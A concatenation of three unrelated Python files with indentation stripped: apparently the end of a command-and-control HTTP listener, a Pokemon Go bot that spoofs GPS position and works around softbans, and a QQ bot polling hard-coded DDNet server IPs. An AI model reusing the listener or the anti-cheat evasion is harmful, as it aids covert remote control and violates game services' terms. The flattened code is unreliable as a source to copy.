cipherlist = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384",
"ECDHE-RSA-AES256-SHA", "AES256-SHA256", "AES128-SHA256"]
selectciph = random.choice(cipherlist)
context.set_ciphers(selectciph)
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print(helpers.color("[!] Listener startup on port %s failed: %s " % (port, e)))
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
def generate_cookie(self):
"""
Generate Cookie
"""
chars = string.ascii_letters
cookie = helpers.random_string(random.randint(6, 16), charset=chars)
return cookie
|
__init__.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import datetime
import json
import logging
import os
import random
import re
import sys
import time
import Queue
import threading
from geopy.geocoders import GoogleV3
from pgoapi import PGoApi
from pgoapi.utilities import f2i, get_cell_ids
import cell_workers
from base_task import BaseTask
from plugin_loader import PluginLoader
from api_wrapper import ApiWrapper
from cell_workers.utils import distance
from event_manager import EventManager
from human_behaviour import sleep
from item_list import Item
from metrics import Metrics
from pokemongo_bot.event_handlers import LoggingHandler, SocketIoHandler, ColoredLoggingHandler
from pokemongo_bot.socketio_server.runner import SocketIoRunner
from pokemongo_bot.websocket_remote_control import WebsocketRemoteControl
from pokemongo_bot.base_dir import _base_dir
from pokemongo_bot.datastore import _init_database, Datastore
from worker_result import WorkerResult
from tree_config_builder import ConfigException, MismatchTaskApiVersion, TreeConfigBuilder
from inventory import init_inventory
from sys import platform as _platform
import struct
class PokemonGoBot(Datastore):
@property
def position(self):
return self.api.actual_lat, self.api.actual_lng, self.api.actual_alt
@property
def noised_position(self):
return self.api.noised_lat, self.api.noised_lng, self.api.noised_alt
#@position.setter # these should be called through api now that gps replication is there...
#def position(self, position_tuple):
# self.api._position_lat, self.api._position_lng, self.api._position_alt = position_tuple
@property
def player_data(self):
"""
Returns the player data as received from the API.
:return: The player data.
:rtype: dict
"""
return self._player
def __init__(self, config):
# Database connection MUST be setup before migrations will work
self.database = _init_database('/data/{}.db'.format(config.username))
self.config = config
super(PokemonGoBot, self).__init__()
self.fort_timeouts = dict()
self.pokemon_list = json.load(
open(os.path.join(_base_dir, 'data', 'pokemon.json'))
)
self.item_list = json.load(open(os.path.join(_base_dir, 'data', 'items.json')))
self.metrics = Metrics(self)
self.latest_inventory = None
self.cell = None
self.recent_forts = [None] * config.forts_max_circle_size
self.tick_count = 0
self.softban = False
self.start_position = None
self.last_map_object = None
self.last_time_map_object = 0
self.logger = logging.getLogger(type(self).__name__)
self.alt = self.config.gps_default_altitude
# Make our own copy of the workers for this instance
self.workers = []
# Theading setup for file writing
self.web_update_queue = Queue.Queue(maxsize=1)
self.web_update_thread = threading.Thread(target=self.update_web_location_worker)
self.web_update_thread.start()
# Heartbeat limiting
self.heartbeat_threshold = self.config.heartbeat_threshold
self.heartbeat_counter = 0
self.last_heartbeat = time.time()
def start(self):
self._setup_event_system()
self._setup_logging()
self._setup_api()
self._load_recent_forts()
init_inventory(self)
self.display_player_info()
self._print_character_info()
if self.config.pokemon_bag_show_at_start and self.config.pokemon_bag_pokemon_info:
self._print_list_pokemon()
random.seed()
def _setup_event_system(self):
handlers = []
if self.config.logging_color:
handlers.append(ColoredLoggingHandler())
else:
handlers.append(LoggingHandler())
if self.config.websocket_server_url:
if self.config.websocket_start_embedded_server:
self.sio_runner = SocketIoRunner(self.config.websocket_server_url)
self.sio_runner.start_listening_async()
websocket_handler = SocketIoHandler(
self,
self.config.websocket_server_url
)
handlers.append(websocket_handler)
if self.config.websocket_remote_control:
remote_control = WebsocketRemoteControl(self).start()
self.event_manager = EventManager(*handlers)
self._register_events()
if self.config.show_events:
self.event_manager.event_report()
sys.exit(1)
# Registering event:
# self.event_manager.register_event("location", parameters=['lat', 'lng'])
#
# Emitting event should be enough to add logging and send websocket
# message: :
# self.event_manager.emit('location', 'level'='info', data={'lat': 1, 'lng':1}),
def _register_events(self):
self.event_manager.register_event(
'location_found',
parameters=('position', 'location')
)
self.event_manager.register_event('api_error')
self.event_manager.register_event('config_error')
self.event_manager.register_event('login_started')
self.event_manager.register_event('login_failed')
self.event_manager.register_event('login_successful')
self.event_manager.register_event('set_start_location')
self.event_manager.register_event('load_cached_location')
self.event_manager.register_event('location_cache_ignored')
self.event_manager.register_event(
'position_update',
parameters=(
'current_position',
'last_position',
'distance', # optional
'distance_unit' # optional
)
)
self.event_manager.register_event(
'path_lap_update',
parameters=(
'number_lap',
'number_lap_max'
)
)
self.event_manager.register_event(
'path_lap_end',
parameters=(
'duration',
'resume'
)
)
self.event_manager.register_event('location_cache_error')
self.event_manager.register_event('bot_start')
self.event_manager.register_event('bot_exit')
self.event_manager.register_event('bot_interrupted')
# sleep stuff
self.event_manager.register_event(
'next_sleep',
parameters=('time',)
)
self.event_manager.register_event(
'bot_sleep',
parameters=(
'time_hms',
'wake'
)
)
# random pause
self.event_manager.register_event(
'next_random_pause',
parameters=(
'time',
'duration'
)
)
self.event_manager.register_event(
'bot_random_pause',
parameters=(
'time_hms',
'resume'
)
)
# fort stuff
self.event_manager.register_event(
'spun_fort',
parameters=(
'fort_id',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'lured_pokemon_found',
parameters=(
'fort_id',
'fort_name',
'encounter_id',
'latitude',
'longitude'
)
)
self.event_manager.register_event(
'moving_to_fort',
parameters=(
'fort_name',
'distance'
)
)
self.event_manager.register_event(
'moving_to_lured_fort',
parameters=(
'fort_name',
'distance',
'lure_distance'
)
)
self.event_manager.register_event(
'spun_pokestop',
parameters=(
'pokestop', 'exp', 'items'
)
)
self.event_manager.register_event(
'pokestop_empty',
parameters=('pokestop',)
)
self.event_manager.register_event(
'pokestop_out_of_range',
parameters=('pokestop',)
)
self.event_manager.register_event(
'pokestop_on_cooldown',
parameters=('pokestop', 'minutes_left')
)
self.event_manager.register_event(
'unknown_spin_result',
parameters=('status_code',)
)
self.event_manager.register_event('pokestop_searching_too_often')
self.event_manager.register_event('arrived_at_fort')
# pokemon stuff
self.event_manager.register_event(
'catchable_pokemon',
parameters=(
'pokemon_id',
'spawn_point_id',
'encounter_id',
'latitude',
'longitude',
'expiration_timestamp_ms'
)
)
self.event_manager.register_event(
'pokemon_appeared',
parameters=(
'pokemon',
'ncp',
'cp',
'iv',
'iv_display',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event('no_pokeballs')
self.event_manager.register_event(
'pokemon_catch_rate',
parameters=(
'catch_rate',
'ball_name',
'berry_name',
'berry_count'
)
)
self.event_manager.register_event(
'threw_berry',
parameters=(
'berry_name',
'ball_name',
'new_catch_rate'
)
)
self.event_manager.register_event(
'threw_pokeball',
parameters=(
'throw_type',
'spin_label',
'ball_name',
'success_percentage',
'count_left'
)
)
self.event_manager.register_event(
'pokemon_capture_failed',
parameters=('pokemon',)
)
self.event_manager.register_event(
'pokemon_vanished',
parameters=(
'pokemon',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event('pokemon_not_in_range')
self.event_manager.register_event('pokemon_inventory_full')
self.event_manager.register_event(
'pokemon_caught',
parameters=(
'pokemon',
'ncp', 'cp', 'iv', 'iv_display', 'exp',
'encounter_id',
'latitude',
'longitude',
'pokemon_id'
)
)
self.event_manager.register_event(
'pokemon_evolved',
parameters=('pokemon', 'iv', 'cp', 'xp', 'candy')
)
self.event_manager.register_event('skip_evolve')
self.event_manager.register_event('threw_berry_failed', parameters=('status_code',))
self.event_manager.register_event('vip_pokemon')
self.event_manager.register_event('gained_candy', parameters=('quantity', 'type'))
self.event_manager.register_event('catch_limit')
# level up stuff
self.event_manager.register_event(
'level_up',
parameters=(
'previous_level',
'current_level'
)
)
self.event_manager.register_event(
'level_up_reward',
parameters=('items',)
)
# lucky egg
self.event_manager.register_event(
'used_lucky_egg',
parameters=('amount_left',)
)
self.event_manager.register_event('lucky_egg_error')
# softban
self.event_manager.register_event('softban')
self.event_manager.register_event('softban_fix')
self.event_manager.register_event('softban_fix_done')
# egg incubating
self.event_manager.register_event(
'incubate_try',
parameters=(
'incubator_id',
'egg_id'
)
)
self.event_manager.register_event(
'incubate',
parameters=('distance_in_km',)
)
self.event_manager.register_event(
'next_egg_incubates',
parameters=('eggs_left', 'eggs_inc', 'eggs')
)
self.event_manager.register_event('incubator_already_used')
self.event_manager.register_event('egg_already_incubating')
self.event_manager.register_event(
'egg_hatched',
parameters=(
'pokemon',
'cp', 'iv', 'exp', 'stardust', 'candy'
)
)
# discard item
self.event_manager.register_event(
'item_discarded',
parameters=(
'amount', 'item', 'maximum'
)
)
self.event_manager.register_event(
'item_discard_skipped',
parameters=('space',)
)
self.event_manager.register_event(
'item_discard_fail',
parameters=('item',)
)
# inventory
self.event_manager.register_event('inventory_full')
# release
self.event_manager.register_event(
'keep_best_release',
parameters=(
'amount', 'pokemon', 'criteria'
)
)
self.event_manager.register_event(
'future_pokemon_release',
parameters=(
'pokemon', 'cp', 'iv', 'below_iv', 'below_cp', 'cp_iv_logic'
)
)
self.event_manager.register_event(
'pokemon_release',
parameters=('pokemon', 'iv', 'cp', 'candy')
)
# polyline walker
self.event_manager.register_event(
'polyline_request',
parameters=('url',)
)
# cluster
self.event_manager.register_event(
'found_cluster',
parameters=(
'num_points', 'forts', 'radius', 'distance'
)
)
self.event_manager.register_event(
'arrived_at_cluster',
parameters=(
'num_points', 'forts', 'radius'
)
)
# rename
self.event_manager.register_event(
'rename_pokemon',
parameters=('old_name', 'current_name',)
)
self.event_manager.register_event(
'pokemon_nickname_invalid',
parameters=('nickname',)
)
self.event_manager.register_event(
'unset_pokemon_nickname',
parameters=('old_name',)
)
# Move To map pokemon
self.event_manager.register_event(
'move_to_map_pokemon_fail',
parameters=('message',)
)
self.event_manager.register_event(
'move_to_map_pokemon_updated_map',
parameters=('lat', 'lon')
)
self.event_manager.register_event(
'move_to_map_pokemon_teleport_to',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_encounter',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_move_towards',
parameters=('poke_name', 'poke_dist', 'poke_lat', 'poke_lon',
'disappears_in')
)
self.event_manager.register_event(
'move_to_map_pokemon_teleport_back',
parameters=('last_lat', 'last_lon')
)
self.event_manager.register_event(
'moving_to_pokemon_throught_fort',
parameters=('fort_name', 'distance','poke_name','poke_dist')
)
# cached recent_forts
self.event_manager.register_event('loaded_cached_forts')
self.event_manager.register_event('cached_fort')
self.event_manager.register_event(
'no_cached_forts',
parameters=('path', )
)
self.event_manager.register_event(
'error_caching_forts',
parameters=('path', )
)
# database shit
self.event_manager.register_event('catch_log')
self.event_manager.register_event('evolve_log')
self.event_manager.register_event('login_log')
self.event_manager.register_event('transfer_log')
self.event_manager.register_event('pokestop_log')
self.event_manager.register_event('softban_log')
def tick(self):
self.health_record.heartbeat()
self.cell = self.get_meta_cell()
now = time.time() * 1000
for fort in self.cell["forts"]:
timeout = fort.get("cooldown_complete_timestamp_ms", 0)
if timeout >= now:
self.fort_timeouts[fort["id"]] = timeout
self.tick_count += 1
# Check if session token has expired
self.check_session(self.position)
for worker in self.workers:
if worker.work() == WorkerResult.RUNNING:
return
def get_meta_cell(self):
location = self.position[0:2]
cells = self.find_close_cells(*location)
# Combine all cells into a single dict of the items we care about.
forts = []
wild_pokemons = []
catchable_pokemons = []
for cell in cells:
if "forts" in cell and len(cell["forts"]):
forts += cell["forts"]
if "wild_pokemons" in cell and len(cell["wild_pokemons"]):
wild_pokemons += cell["wild_pokemons"]
if "catchable_pokemons" in cell and len(cell["catchable_pokemons"]):
catchable_pokemons += cell["catchable_pokemons"]
# If there are forts present in the cells sent from the server or we don't yet have any cell data, return all data retrieved
if len(forts) > 1 or not self.cell:
return {
"forts": forts,
"wild_pokemons": wild_pokemons,
"catchable_pokemons": catchable_pokemons
}
# If there are no forts present in the data from the server, keep our existing fort data and only update the pokemon cells.
else:
return {
"forts": self.cell["forts"],
"wild_pokemons": wild_pokemons,
"catchable_pokemons": catchable_pokemons
}
def update_web_location(self, cells=[], lat=None, lng=None, alt=None):
# we can call the function with no arguments and still get the position
# and map_cells
if lat is None:
lat = self.api._position_lat
if lng is None:
lng = self.api._position_lng
if alt is None:
alt = self.api._position_alt
if cells == []:
location = self.position[0:2]
cells = self.find_close_cells(*location)
user_data_cells = os.path.join(_base_dir, 'data', 'cells-%s.json' % self.config.username)
try:
with open(user_data_cells, 'w') as outfile:
json.dump(cells, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
user_web_location = os.path.join(
_base_dir, 'web', 'location-%s.json' % self.config.username
)
# alt is unused atm but makes using *location easier
try:
with open(user_web_location, 'w') as outfile:
json.dump({
'lat': lat,
'lng': lng,
'alt': alt,
'cells': cells
}, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
user_data_lastlocation = os.path.join(
_base_dir, 'data', 'last-location-%s.json' % self.config.username
)
try:
with open(user_data_lastlocation, 'w') as outfile:
json.dump({'lat': lat, 'lng': lng, 'alt': alt, 'start_position': self.start_position}, outfile)
except IOError as e:
self.logger.info('[x] Error while opening location file: %s' % e)
def find_close_cells(self, lat, lng):
cellid = get_cell_ids(lat, lng)
timestamp = [0, ] * len(cellid)
response_dict = self.get_map_objects(lat, lng, timestamp, cellid)
map_objects = response_dict.get(
'responses', {}
).get('GET_MAP_OBJECTS', {})
status = map_objects.get('status', None)
map_cells = []
if status and status == 1:
map_cells = map_objects['map_cells']
position = (lat, lng, 0)
map_cells.sort(
key=lambda x: distance(
lat,
lng,
x['forts'][0]['latitude'],
x['forts'][0]['longitude']) if x.get('forts', []) else 1e6
)
return map_cells
def _setup_logging(self):
# log settings
# log format
if self.config.debug:
log_level = logging.DEBUG
logging.getLogger("requests").setLevel(logging.DEBUG)
logging.getLogger("websocket").setLevel(logging.DEBUG)
logging.getLogger("socketio").setLevel(logging.DEBUG)
logging.getLogger("engineio").setLevel(logging.DEBUG)
logging.getLogger("socketIO-client").setLevel(logging.DEBUG)
logging.getLogger("pgoapi").setLevel(logging.DEBUG)
logging.getLogger("rpc_api").setLevel(logging.DEBUG)
else:
log_level = logging.ERROR
logging.getLogger("requests").setLevel(logging.ERROR)
logging.getLogger("websocket").setLevel(logging.ERROR)
logging.getLogger("socketio").setLevel(logging.ERROR)
logging.getLogger("engineio").setLevel(logging.ERROR)
logging.getLogger("socketIO-client").setLevel(logging.ERROR)
logging.getLogger("pgoapi").setLevel(logging.ERROR)
logging.getLogger("rpc_api").setLevel(logging.ERROR)
logging.basicConfig(
level=log_level,
format='%(asctime)s [%(name)10s] [%(levelname)s] %(message)s'
)
def check_session(self, position):
# Check session expiry
if self.api._auth_provider and self.api._auth_provider._ticket_expire:
# prevent crash if return not numeric value
if not self.is_numeric(self.api._auth_provider._ticket_expire):
self.logger.info("Ticket expired value is not numeric", 'yellow')
return
remaining_time = \
self.api._auth_provider._ticket_expire / 1000 - time.time()
if remaining_time < 60:
self.event_manager.emit(
'api_error',
sender=self,
level='info',
formatted='Session stale, re-logging in.'
)
self.api = ApiWrapper(config=self.config)
self.api.set_position(*position)
self.login()
self.api.activate_signature(self.get_encryption_lib())
@staticmethod
def is_numeric(s):
try:
float(s)
return True
except ValueError:
return False
def login(self):
self.event_manager.emit(
'login_started',
sender=self,
level='info',
formatted="Login procedure started."
)
lat, lng = self.position[0:2]
self.api.set_position(lat, lng, self.alt) # or should the alt kept to zero?
while not self.api.login(
self.config.auth_service,
str(self.config.username),
str(self.config.password)):
self.event_manager.emit(
'login_failed',
sender=self,
level='info',
formatted="Login error, server busy. Waiting 10 seconds to try again."
)
time.sleep(10)
with self.database as conn:
c = conn.cursor()
c.execute("SELECT COUNT(name) FROM sqlite_master WHERE type='table' AND name='login'")
result = c.fetchone()
while True:
if result[0] == 1:
conn.execute('''INSERT INTO login (timestamp, message) VALUES (?, ?)''', (time.time(), 'LOGIN_SUCCESS'))
break
else:
self.event_manager.emit(
'login_failed',
sender=self,
level='info',
formatted="Login table not founded, skipping log"
)
break
self.event_manager.emit(
'login_successful',
sender=self,
level='info',
formatted="Login successful."
)
def get_encryption_lib(self):
if _platform == "Windows" or _platform == "win32":
# Check if we are on 32 or 64 bit
if sys.maxsize > 2**32:
file_name = 'encrypt_64.dll'
else:
file_name = 'encrypt.dll'
else:
file_name = 'encrypt.so'
if self.config.encrypt_location == '':
path = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
else:
path = self.config.encrypt_location
full_path = path + '/'+ file_name
if not os.path.isfile(full_path):
self.logger.error(file_name + ' is not found! Please place it in the bots root directory or set encrypt_location in config.')
self.logger.info('Platform: '+ _platform + ' ' + file_name + ' directory: '+ path)
sys.exit(1)
else:
self.logger.info('Found '+ file_name +'! Platform: ' + _platform + ' ' + file_name + ' directory: ' + path)
return full_path
def _setup_api(self):
# instantiate pgoapi
self.api = ApiWrapper(config=self.config)
# provide player position on the earth
self._set_starting_position()
self.login()
# chain subrequests (methods) into one RPC call
self.api.activate_signature(self.get_encryption_lib())
self.logger.info('')
# send empty map_cells and then our position
self.update_web_location()
def _print_character_info(self):
# get player profile call
# ----------------------
response_dict = self.api.get_player()
# print('Response dictionary: \n\r{}'.format(json.dumps(response_dict, indent=2)))
currency_1 = "0"
currency_2 = "0"
if response_dict:
self._player = response_dict['responses']['GET_PLAYER']['player_data']
player = self._player
else:
self.logger.info(
"The API didn't return player info, servers are unstable - "
"retrying.", 'red'
)
sleep(5)
self._print_character_info()
# @@@ TODO: Convert this to d/m/Y H:M:S
creation_date = datetime.datetime.fromtimestamp(
player['creation_timestamp_ms'] / 1e3)
creation_date = creation_date.strftime("%Y/%m/%d %H:%M:%S")
pokecoins = '0'
stardust = '0'
items_inventory = inventory.items()
if 'amount' in player['currencies'][0]:
pokecoins = player['currencies'][0]['amount']
if 'amount' in player['currencies'][1]:
stardust = player['currencies'][1]['amount']
self.logger.info('')
self.logger.info('--- {username} ---'.format(**player))
self.logger.info(
'Pokemon Bag: {}/{}'.format(
inventory.Pokemons.get_space_used(),
inventory.get_pokemon_inventory_size()
)
)
self.logger.info(
'Items: {}/{}'.format(
inventory.Items.get_space_used(),
inventory.get_item_inventory_size()
)
)
self.logger.info(
'Stardust: {}'.format(stardust) +
' | Pokecoins: {}'.format(pokecoins)
)
# Items Output
self.logger.info(
'PokeBalls: ' + str(items_inventory.get(1).count) +
' | GreatBalls: ' + str(items_inventory.get(2).count) +
' | UltraBalls: ' + str(items_inventory.get(3).count) +
' | MasterBalls: ' + str(items_inventory.get(4).count))
self.logger.info(
'RazzBerries: ' + str(items_inventory.get(701).count) +
' | BlukBerries: ' + str(items_inventory.get(702).count) +
' | NanabBerries: ' + str(items_inventory.get(703).count))
self.logger.info(
'LuckyEgg: ' + str(items_inventory.get(301).count) +
' | Incubator: ' + str(items_inventory.get(902).count) +
' | TroyDisk: ' + str(items_inventory.get(501).count))
self.logger.info(
'Potion: ' + str(items_inventory.get(101).count) +
' | SuperPotion: ' + str(items_inventory.get(102).count) +
' | HyperPotion: ' + str(items_inventory.get(103).count) +
' | MaxPotion: ' + str(items_inventory.get(104).count))
self.logger.info(
'Incense: ' + str(items_inventory.get(401).count) +
' | IncenseSpicy: ' + str(items_inventory.get(402).count) +
' | IncenseCool: ' + str(items_inventory.get(403).count))
self.logger.info(
'Revive: ' + str(items_inventory.get(201).count) +
' | MaxRevive: ' + str(items_inventory.get(202).count))
self.logger.info('')
def _print_list_pokemon(self):
# get pokemon list
bag = inventory.pokemons().all()
id_list =list(set(map(lambda x: x.pokemon_id, bag)))
id_list.sort()
pokemon_list = [filter(lambda x: x.pokemon_id == y, bag) for y in id_list]
show_count = self.config.pokemon_bag_show_count
show_candies = self.config.pokemon_bag_show_candies
poke_info_displayed = self.config.pokemon_bag_pokemon_info
def get_poke_info(info, pokemon):
poke_info = {
'cp': 'CP {}'.format(pokemon.cp),
'iv_ads': 'A/D/S {}/{}/{}'.format(pokemon.iv_attack, pokemon.iv_defense, pokemon.iv_stamina),
'iv_pct': 'IV {}'.format(pokemon.iv),
'ivcp': 'IVCP {}'.format(round(pokemon.ivcp,2)),
'ncp': 'NCP {}'.format(round(pokemon.cp_percent,2)),
'level': "Level {}".format(pokemon.level),
'hp': 'HP {}/{}'.format(pokemon.hp, pokemon.hp_max),
'moveset': 'Moves: {}'.format(pokemon.moveset),
'dps': 'DPS {}'.format(round(pokemon.moveset.dps, 2))
}
if info not in poke_info:
raise ConfigException("info '{}' isn't available for displaying".format(info))
return poke_info[info]
self.logger.info('Pokemon:')
for pokes in pokemon_list:
line_p = '#{} {}'.format(pokes[0].pokemon_id, pokes[0].name)
if show_count:
line_p += '[{}]'.format(len(pokes))
if show_candies:
line_p += '[{} candies]'.format(pokes[0].candy_quantity)
line_p += ': '
poke_info = ['({})'.format(', '.join([get_poke_info(x, p) for x in poke_info_displayed])) for p in pokes]
self.logger.info(line_p + ' | '.join(poke_info))
self.logger.info('')
def use_lucky_egg(self):
return self.api.use_item_xp_boost(item_id=301)
def _set_starting_position(self):
self.event_manager.emit(
'set_start_location',
sender=self,
level='info',
formatted='Setting start location.'
)
has_position = False
if self.config.test:
# TODO: Add unit tests
return
if self.config.location:
location_str = self.config.location
location = self.get_pos_by_name(location_str.replace(" ", ""))
msg = "Location found: {location} {position}"
self.event_manager.emit(
'location_found',
sender=self,
level='info',
formatted=msg,
data={
'location': location_str,
'position': location
}
)
self.api.set_position(*location)
self.event_manager.emit(
'position_update',
sender=self,
level='info',
formatted="Now at {current_position}",
data={
'current_position': self.position,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
self.start_position = self.position
has_position = True
if self.config.location_cache:
try:
# save location flag used to pull the last known location from
# the location.json
self.event_manager.emit(
'load_cached_location',
sender=self,
level='debug',
formatted='Loading cached location...'
)
with open(os.path.join(_base_dir, 'data', 'last-location-%s.json' %
self.config.username)) as f:
location_json = json.load(f)
location = (
location_json['lat'],
location_json['lng'],
location_json['alt'],
)
# If location has been set in config, only use cache if starting position has not differed
if has_position and 'start_position' in location_json:
last_start_position = tuple(location_json.get('start_position', []))
# Start position has to have been set on a previous run to do this check
if last_start_position and last_start_position != self.start_position:
msg = 'Going to a new place, ignoring cached location.'
self.event_manager.emit(
'location_cache_ignored',
sender=self,
level='debug',
formatted=msg
)
return
self.api.set_position(*location)
self.event_manager.emit(
'position_update',
sender=self,
level='debug',
formatted='Loaded location {current_position} from cache',
data={
'current_position': location,
'last_position': '',
'distance': '',
'distance_unit': ''
}
)
has_position = True
except Exception:
if has_position is False:
sys.exit(
"No cached Location. Please specify initial location."
)
self.event_manager.emit(
'location_cache_error',
sender=self,
level='debug',
formatted='Parsing cached location failed.'
)
def get_pos_by_name(self, location_name):
# Check if the given location is already a coordinate.
if ',' in location_name:
possible_coordinates = re.findall(
"[-]?\d{1,3}[.]\d{3,7}", location_name
)
if len(possible_coordinates) == 2:
# 2 matches, this must be a coordinate. We'll bypass the Google
# geocode so we keep the exact location.
self.logger.info(
'[x] Coordinates found in passed in location, '
'not geocoding.'
)
return float(possible_coordinates[0]), float(possible_coordinates[1]), self.alt
geolocator = GoogleV3(api_key=self.config.gmapkey)
loc = geolocator.geocode(location_name, timeout=10)
return float(loc.latitude), float(loc.longitude), float(loc.altitude)
def heartbeat(self):
# Remove forts that we can now spin again.
now = time.time()
self.fort_timeouts = {id: timeout for id, timeout
in self.fort_timeouts.iteritems()
if timeout >= now * 1000}
if now - self.last_heartbeat >= self.heartbeat_threshold:
self.last_heartbeat = now
request = self.api.create_request()
request.get_player()
request.check_awarded_badges()
request.call()
try:
self.web_update_queue.put_nowait(True) # do this outside of thread every tick
except Queue.Full:
pass
def update_web_location_worker(self):
while True:
self.web_update_queue.get()
self.update_web_location()
def display_player_info(self):
inventory_items = self.api.get_inventory()
inventory_items = inventory_items['responses']['GET_INVENTORY']['inventory_delta']['inventory_items']
player_stats = next((x["inventory_item_data"]["player_stats"]
for x in inventory_items
if x.get("inventory_item_data", {}).get("player_stats", {})),
None)
if player_stats:
nextlvlxp = (int(player_stats.get('next_level_xp', 0)) - int(player_stats.get('experience', 0)))
if 'level' in player_stats and 'experience' in player_stats:
self.logger.info(
'Level: {level}'.format(
**player_stats) +
' (Next Level: {} XP)'.format(
nextlvlxp) +
' (Total: {experience} XP)'
''.format(**player_stats))
if 'pokemons_captured' in player_stats and 'poke_stop_visits' in player_stats:
self.logger.info(
'Pokemon Captured: '
'{pokemons_captured}'.format(
**player_stats) +
' | Pokestops Visited: '
'{poke_stop_visits}'.format(
**player_stats))
def get_forts(self, order_by_distance=False):
forts = [fort
for fort in self.cell['forts']
if 'latitude' in fort and 'type' in fort]
if order_by_distance:
forts.sort(key=lambda x: distance(
self.position[0],
self.position[1],
x['latitude'],
x['longitude']
))
return forts
def get_map_objects(self, lat, lng, timestamp, cellid):
if time.time() - self.last_time_map_object < self.config.map_object_cache_time:
return self.last_map_object
self.last_map_object = self.api.get_map_objects(
latitude=f2i(lat),
longitude=f2i(lng),
since_timestamp_ms=timestamp,
cell_id=cellid
)
self.last_time_map_object = time.time()
return self.last_map_object
def _load_recent_forts(self):
if not self.config.forts_cache_recent_forts:
return
cached_forts_path = os.path.join(_base_dir, 'data', 'recent-forts-%s.json' % self.config.username)
try:
# load the cached recent forts
with open(cached_forts_path) as f:
cached_recent_forts = json.load(f)
num_cached_recent_forts = len(cached_recent_forts)
num_recent_forts = len(self.recent_forts)
# Handles changes in max_circle_size
if not num_recent_forts:
self.recent_forts = []
elif num_recent_forts > num_cached_recent_forts:
self.recent_forts[-num_cached_recent_forts:] = cached_recent_forts
elif num_recent_forts < num_cached_recent_forts:
self.recent_forts = cached_recent_forts[-num_recent_forts:]
else:
self.recent_forts = cached_recent_forts
self.event_manager.emit(
'loaded_cached_forts',
sender=self,
level='debug',
formatted='Loaded cached forts...'
)
except IOError:
self.event_manager.emit(
'no_cached_forts',
sender=self,
level='debug',
formatted='Starting new cached forts for {path}',
data={'path': cached_forts_path}
)
|
ddnetQQbot.py
|
from qqbot import _bot as bot
import time
import csv
import requests
import json
import threading
#from multiprocessing import Process, Lock
from getServerInfo import Server_Info
servers_CHNTom = [[('119.29.57.22', 8304), 0],
[('119.29.57.22', 8403), 0],
[('119.29.57.22', 7321), 0],
[('119.29.57.22', 7304), 0],
[('119.29.57.22', 7317), 0],
[('119.29.57.22', 8303), 0],
[('119.29.57.22', 8203), 0],
[('119.29.57.22', 8406), 0],
[('119.29.57.22', 8409), 0],
[('119.29.57.22', 8200), 0],
[('119.29.57.22', 7303), 0],
[('119.29.57.22', 8404), 0],
[('119.29.57.22', 8410), 0],
[('119.29.57.22', 8201), 0],
[('119.29.57.22', 8408), 0],
[('119.29.57.22', 8202), 0],
[('119.29.57.22', 7306), 0],
[('119.29.57.22', 7400), 0],
[('119.29.57.22', 8407), 0],
[('119.29.57.22', 7401), 0],
[('119.29.57.22', 8305), 0],
[('119.29.57.22', 8402), 0],
[('119.29.57.22', 7305), 0],
[('119.29.106.160', 8303), 0],
[('202.118.17.142', 8121), 0],
[('103.88.47.135', 8121), 0],
[('114.220.10.9', 8303), 0],
[('118.126.91.236', 8304), 0],
[('118.126.91.236', 8305), 0],
[('47.98.59.11', 8303), 0],
[('47.74.9.32', 8303), 0],
[('118.126.91.236', 8303), 0],
[('118.126.91.236', 8302), 0],
[('118.126.91.236', 8301), 0],
[('106.14.5.168', 8304), 0],
[('106.14.5.168', 7988), 0],
[('45.32.41.155', 8303), 0],
[('47.74.32.152', 8121), 0],
[('202.141.160.95', 40125), 0],
[('202.141.160.95', 40028), 0],
[('202.141.160.95', 40126), 0],
[('202.141.160.95', 40128), 0],
[('35.197.129.14', 8303), 0]]
#get the players list to Tom Servers in another thread every 30s
players_list = []
last_players_list = []
lock = threading.Lock()
#lock = Lock()
def get_servers_info():
global players_list
while True:
servers_info = []
#print(str(len(servers_CHNTom)) + " servers")
for server in servers_CHNTom:
#[('47.74.9.32', 8303), 0]
s = Server_Info(server[0], server[1])
servers_info.append(s)
s.start()
time.sleep(0.001) # avoid issues
num_players = 0
num_clients = 0
servers_info_list = []
while len(servers_info) != 0:
if servers_info[0].finished == True:
if servers_info[0].info:
servers_info_list.append(servers_info[0].info)
num_players += servers_info[0].info["num_players"]
if servers_info[0].type == 0:
num_clients += servers_info[0].info["num_clients"]
else:
num_clients += servers_info[0].info["num_players"]
del servers_info[0]
time.sleep(0.001) # be nice
#print(str(num_players) + " players and " + str(num_clients-num_players) + " spectators")
